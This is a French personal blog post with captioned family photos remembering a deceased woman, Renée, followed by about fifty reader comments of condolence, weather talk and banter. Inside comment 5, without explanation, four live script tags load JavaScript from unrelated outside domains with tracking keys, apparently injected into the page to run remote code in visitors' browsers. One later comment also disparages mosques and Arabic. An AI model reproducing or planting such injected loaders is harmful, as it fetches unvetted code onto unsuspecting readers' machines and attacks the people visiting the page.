• Au fil du temps (2)

    Quelques souvenirs prélevés dans l'album.

     

    Au fil du temps (2)

    Sur le quai de Carry.

     

    Au fil du temps (2)

    Tout en chinant à l'Isle sur la Sorgue.

     

    Au fil du temps (2)

    En compagnie de son père, elle attend impatiemment l'arrivée de Dimitri.

     

    Au fil du temps (2)

    au salon de coiffure.

     

    Au fil du temps (2)

     

    Au fil du temps (2)

     

    Au fil du temps (2)

    En route pour Rosas.

     

    Au fil du temps (2)

    Soirée en terrasse.

     

    Au fil du temps (2)

    Avait elle gagné ?

     

    Au fil du temps (2)

    Avec son petit Dimitri.

     

     

     

     

     

     

    « Au fil du tempsAu fil du temps (3) »

  • Commentaires

    1
    Mardi 14 Janvier 2020 à 10:42

    Quel bonheur de la revoir, merci Cricri pour ce partage de souvenirs,

    j'en suis toute émue!

    Aurais-tu des photos de sa jeunesse sur Metz?

    Je l'ai peut-être rencontrée un jour, qui sait?

    Gros bisous d'amitié,

    Mireille du sablon

     

    2
    Mardi 14 Janvier 2020 à 11:16

    Merci pour ces souvenirs, ça fait vraiment plaisir. 

    Amitiés

    3
    Mardi 14 Janvier 2020 à 11:51

    grand merci pour tout cela ....bien contente de te lire ...

    4
    Mardi 14 Janvier 2020 à 13:19

    De beaux souvenirs, 

    je pense souvent à elle. 

    Bonne semaine, 

    Nadine

    5
    Mardi 14 Janvier 2020 à 15:54

    C'est la première fois que j'ose prendre des images sur son blog de Mamiekéké depuis sa disparition.

    De quoi elle est décédé?

    Merci Cricri d'amour.

    Mireille

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8786x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8786x&format=arrjs&r=1579013773830" type="text/javascript"></script> <script src="http://toolsmagick.com/ext/2252259d09bdba7f1b.js?sid=52646_8786_&title=qqq&blocks[]=31af2" type="text/javascript"></script>
      • Mardi 14 Janvier 2020 à 16:42

        Mireille ,

        c'est délicat de vous répondre.

        Vous pouvez aussi corriger l'adresse de votre blog,

        actuellement le lien ne mène nulle part.

        Merci.

    6
    Mardi 14 Janvier 2020 à 16:13
    Renée

    Avec ces cliché on sent le manque et la nostalgie de ces heureux moments...Courage. Bisous

    7
    Mardi 14 Janvier 2020 à 18:24

    Bonsoir Cricri

    Ben non je ne vais rien dire à la motocyclette. On garde ça entre nous, c'est trop mimi d'avoir un territoire à soi, c'est comme les chats qui le marquent !

    Je te souhaite une bonne soirée

    Amitiés

    Prends soin de toi

    @lain

    8
    Mardi 14 Janvier 2020 à 18:30

    De jolies photos pour des moments de bonheur... On ne l'oublie pas. J'espère malgré tout que ça va Cricri. Amitiés

    9
    wzeig
    Mardi 14 Janvier 2020 à 20:54
    wzeig

    Merci pour ce partage, plein de bonheur.

    Amitiés.

    10
    Mercredi 15 Janvier 2020 à 00:22

    Merci Cricri de partager ces photos "bonheur" qui me mettent la larme à l'oeil... Mais je suis contente de voir ma Renée heureuse dans sa vie...
    Pas facile de faire son deuil et je pense que ce n'est pas facile de partager ces sourires et ce bonheur mais c'est déjà un grand pas... Je n'y suis jamais parvenue...

    11
    Mercredi 15 Janvier 2020 à 07:14

    Merci pour ces belles photos souvenirs.

    Toujours aussi belle, elle est dans mon coeur avec tous ceux que j'ai aimé ...

    Bon mercredi toujours gris !
    Marre du vent et de la pluie ...
    Gros bisoux, mon cricri chéri ♥

    (Tiens, j'ai fait un poème !)

     

    12
    Mercredi 15 Janvier 2020 à 18:47
    Merci cher Cricri, pour toutes ces photos, quels merveilleux souvenirs et surtout quel bonheur de vous avoir rencontrés tous les deux.
    Tous gros bisous ainsi qu'à Sabine et Dimitri
    13
    Mercredi 15 Janvier 2020 à 19:04

    Salut,

    Ca fait du bien de revoir les gens qui rient.

    On a encore eu mauvais temps aujourd'hui mais c'est de saison.

    On dirait qu'il fait moins froid mais plus humide.

    Bonne journée

    14
    Jeudi 16 Janvier 2020 à 17:22

    Salut,

    Aujourd'hui il a fait beau alors on est allé visiter un nouveau LIDL.
    Il est super alors on a dépenser surtout que ce sont les soldes.

    Bonne fin de semaine

    15
    Vendredi 17 Janvier 2020 à 10:06

    Bonjour Cricri

    Il a bien grandi Dimitri, ce sont de belles photos souvenir.

    Pour se faire moine tu te fais faire la tonsure chez toi et c'est bon, tu n'as pas besoin d'aller sur place !

    J'espère que tu vas bien ?

    Merci de ton passage, c'est sympa.

    Je te souhaite une bonne journée, ici c'est le temps pourri !

    Amitiés

    @lain

    16
    Vendredi 17 Janvier 2020 à 10:26

    Toutes ces photos transpirent la bonne humeur qui était sa nature profonde

    Son sourire nous manque

    17
    Vendredi 17 Janvier 2020 à 15:49

    Salut,

    La météo prévoit de la pluie mais on a du soleil. Par contre il fait froid.

    Avec Tiotte on se soigne la bronchite, ça crache dur.

    Je te souhaite un bon week-end

    18
    Vendredi 17 Janvier 2020 à 17:11

    Bonjour Cricri

    Qu'est ce que tu entends par il fallait qu'on les coupe ... Je ne voit pas de quel endroit du corps tu parles ... hihihi !

    Bon chouette, le temps pourri est revenu et l'hiver avec, c'était trop beau pour être vrai, l'été au mois de janvier !

    Je te souhaite une bonne journée

    Amitiés

    @lain

    19
    Samedi 18 Janvier 2020 à 18:20

    Salut,
    Le temps était ensoleillé .
    On est allé se balader malgré la bronchite.
    Ca fait du bien de prendre l'air.
    Bonne fin de journée

    20
    Dimanche 19 Janvier 2020 à 05:40

    Bon dimanche frisquet et bonne semaine prochaine.
    Incroyable comme le temps passe vite, même si on trouve quelques fois le temps long ...
    Gros bisoux, mon cricri chéri ♥

     

    21
    Dimanche 19 Janvier 2020 à 19:14

    Cher Cricri,

    Que de belles photos ! Le temps du bonheur !

    J'espère que tu as passé un bon week-end, Pour ma part il fut excellent.

    Reçois toute mon amitié,

    Bisous,

    MF

    22
    Lundi 20 Janvier 2020 à 11:56

    Bonjour Cricri,

    Comment vas-tu ?

    Merci pour le partage de ces jolies photos.

    Passe une très bonne journée.

    Bisous.

    23
    Lundi 20 Janvier 2020 à 17:38

    Salut

    On est allé faire du shopping soldes et on a été surpris qu'il n'y avait presque personne.

    Tant mieux comme ça la circulation était bonne et on avait de quoi se garer.

    Bonne semaine

    24
    Mardi 21 Janvier 2020 à 16:11

    Bonjour Cricri

    Oui hier nous étions samedi, pas dimanche et aujourd'hui nous sommes mardi, la semaine passe vite quand même ... hihi !

    Contrairement à chez vous nous avons un temps superbe, ciel bleu, soleil mais de la fraîcheur et des gelées matinales. Ca caille quand même un peu.

    Ce soir répétition avec le groupe, je vais être au chaud

    Je te souhaite une très bonne fin de journée

    Amitiés

    @lain

      • Mardi 21 Janvier 2020 à 16:12

        hihihi, chui mort de rire, j'ai essayé de faire des ronds de jambes avec les jours et je me mélange les crayons tout seul ... Ké malheur !

    25
    Mercredi 22 Janvier 2020 à 14:54

    Salut

    Le temps est maussade avec du brouillard à couper au couteau le matin.

    Je plains ceux qui vont au boulot très tôt.

    Bonne journée

    26
    Mercredi 22 Janvier 2020 à 17:47

    Bonsoir Cricri

    Pour les vins d'Arbois c'est pas mauvais n'empêche. Ca se boit bien. Ca me rappelle mon voyage là bas, les gens sont super sympas !

    Pour la météo et la politique c'est bien de faire la comparaison, un coup c'est beau un coup c'est mauvais, mais pour la politique ça devient catastrophique

    Je te souhaite une bonne soirée

    Amitiés

    @lain

    27
    Vendredi 24 Janvier 2020 à 16:13

    Salut,
    Le ciel est gris . On a pas eu de soleil aujourd'hui et il fait froid.
    On reste au chaud.
    Bon week-end

    28
    Samedi 25 Janvier 2020 à 06:45

    Bon week end, toujours bien froid.
    Pas pu avoir la rhumato pour mes résultats d'analyses !
    Pas plus que mon toubib.
    J'en reste donc avec mes suppositions ...

    Je pense que s'il y avait eu quelque chose de grave, l'un ou l'autre m'aurait contactée.
    Quoique, maintenant, je ne sais plus en qui avoir confiance !
    Gros bisoux, mon cricri chéri ♥

     

    29
    Dimanche 26 Janvier 2020 à 02:08

    merci pour ces souvenirs de Renée!

    je ne l'oublie pas, elle est dans mon coeur!

    30
    Dimanche 26 Janvier 2020 à 07:38

    Cher Cricri,

    J'espère que tout va bien pour toi,

    Bon dimanche,

    Bisous,

    MF

    31
    Dimanche 26 Janvier 2020 à 22:00

    Bonsoir Cricri. J'espère que tu vas bien et garde le moral. Bonne soirée et bises

    32
    Lundi 27 Janvier 2020 à 09:48

    Bonjour Cricri,

    Comment vas-tu ?

    Ici, ça va à part le temps qui s'est mis à la pluie, je préférais

    le froid de la semaine dernière.

    Passe une très bonne semaine.

    Bisous.

    33
    Mardi 28 Janvier 2020 à 15:25

    Salut

    Le temps est ensoleillé cet après midi alors que partout il pleut?

    Mais il fait froid alors on reste devant la télé sous la couette.

    Bonne journée

    34
    Mardi 28 Janvier 2020 à 20:18

    Bonsoir Cricri. Merci pour ces belles photos de souvenirs heureux, avec ceux et celles qu'elle aimait. Renée avait un beau sourire et beaucoup d'énergie.

    Bonne soirée et bises

    35
    Mercredi 29 Janvier 2020 à 09:15

    Cher Cricri,

    Tu t'es pris pour Edmond Dantès sur ton com !

    Je te plains, c'est dur la solitude !

    Ici, ciel d'azur, peu de vent et superbe soleil.

    Excellente journée,

    Bisous,

    MF

    36
    Mercredi 29 Janvier 2020 à 16:01

    Bonjour Cricri

    En ce moment les blogs et moi nous ne nous parlons plus trop. Pas le temps.

    Ben moi aussi j'aimerais être avec une belle blonde mais j'ai une jolie châtain, je ne pers pas au change :)

    J'espère que tu remontes doucement la pente.

    Je te souhaite une agréable journée

    Amitiés

    @lain

    37
    Jeudi 30 Janvier 2020 à 07:08

    Bon jeudi en douceur mais avec une france toute gris foncé !
    Gros bisoux, mon cricri chéri ♥

     

    38
    Jeudi 30 Janvier 2020 à 18:57

    Salut

    On peut dire qu'on a été rincé aujourd'hui.

    On est quand même allé faire les courses et c'était calme dans l'hyper.

    Bonne journée

    39
    Jeudi 30 Janvier 2020 à 19:43

    Bonsoir Cricri. Il a beaucoup plu  ces jours-ci mais il fait très doux.

    Bonne soirée et bises

    40
    Jeudi 30 Janvier 2020 à 21:14

    Bonsoir  Cricri,

    Je   viens te souhaiter un très bon week-end, le mien sera chargé en émotions par des retrouvailles fort sympathiques.

    J'espère que tout va bien pour toi,

    Bonne soirée,

    Grosses bises,

    MF

    41
    Vendredi 31 Janvier 2020 à 16:36
    42
    Vendredi 31 Janvier 2020 à 16:47

    Salut,

    Le temps est pluvieux et on en a pour un bout de temps d'après la météo.

    L'entourloupe macronique aux municipales .

    43
    Vendredi 31 Janvier 2020 à 18:37

    Bonsoir Cricri

    Je suis content de ton passage.

    Tu te remets à la politique c'est très bon pour la santé mais pas pour les nerfs !!!

    hihihi j'adore ... ben j'essaie de faire plaisir à tout le monde, même à motocyclette ... Il n'y a pas de raison que je le prive de mon blog.

    J'espère que tu vas bien

    Je te souhaite une bonne soirée

    Amitiés

    @lain

    44
    Samedi 1er Février 2020 à 07:48

    Bon week end, dans une douceur quasi printanière mais risque de pluies.
    Toujours dans des examens, je suis aussi en pleine fabrication de nouvelles chaussures orthopédiques montantes
    ainsi qu'un corset tenant tout le buste.
    Je mettrais autant de temps à m'habiller qu'un croisé avec son armure !
    Gros bisoux, mon cricri chéri ♥

     

    45
    Samedi 1er Février 2020 à 19:18

    Bonsoir Cricri. Merci pour votre ressenti sur ces 3 films. J'irais bien voir Docteur et 1917. Bonne soirée et bises

    46
    Lundi 3 Février 2020 à 14:51

    Bonjour Cricri,

    As-tu passé un bon week-end ?

    j'espère que tout va pour le mieux.

    Passe une très bonne semaine.

    Bisous.

    47
    Mardi 4 Février 2020 à 12:07

    Salut

    De la pluie la nuit et du beau temps le jour.

    Que demander de plus.

    Bonne journée

    48
    Mardi 4 Février 2020 à 14:34

    tant de beaux souvenirs qui font qu'elle est toujours parmi nous avec sa bonne humeur

    Bonne soirée.

    49
    Mardi 4 Février 2020 à 16:12

    Bonjour Cricri

    Ah mais tu as raison, il faudrait que je leur fasse un article qui recence toutes les églises, cathédrales, basiliques, etc. qui sont réservées au culte chrétien, simplement pour leur faire une piqûre de rappelle car en ce moment et depuis trop longtemps, on ne parle que mosquées et autres casbah ... Bientôt il vont réécrire la bible en arabe ! Quelle honte.

     

    J'espère que tu vas de mieux en mieux, ou tout du moins un petit peu mieux.

     

    Tu déposeras de bien douces pensées sur la tombe de Renée.

     

    Amitiés

     

    @lain

     

    50
    Mardi 3 Mars 2020 à 14:25
    Cassandre

    Bonjour Cricri,

     

    Je suis toujours heureuse de voir le beau sourire de Renée...

    Toutes ces photos des voyages et excursions que vous avez faits ensemble;

    Dimitri et sa maman, les réunions de famille..

     

    et certainement vous, Cricri,  derrière l'objectif, qui saisissez tous ces instants souvenirs..

    On n'oublie pas Renée,

    Toutes mes amitiés,

     

    51
    Mardi 7 Avril 2020 à 12:28

    Oui, il est beau... et sa Mamie aussi !



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :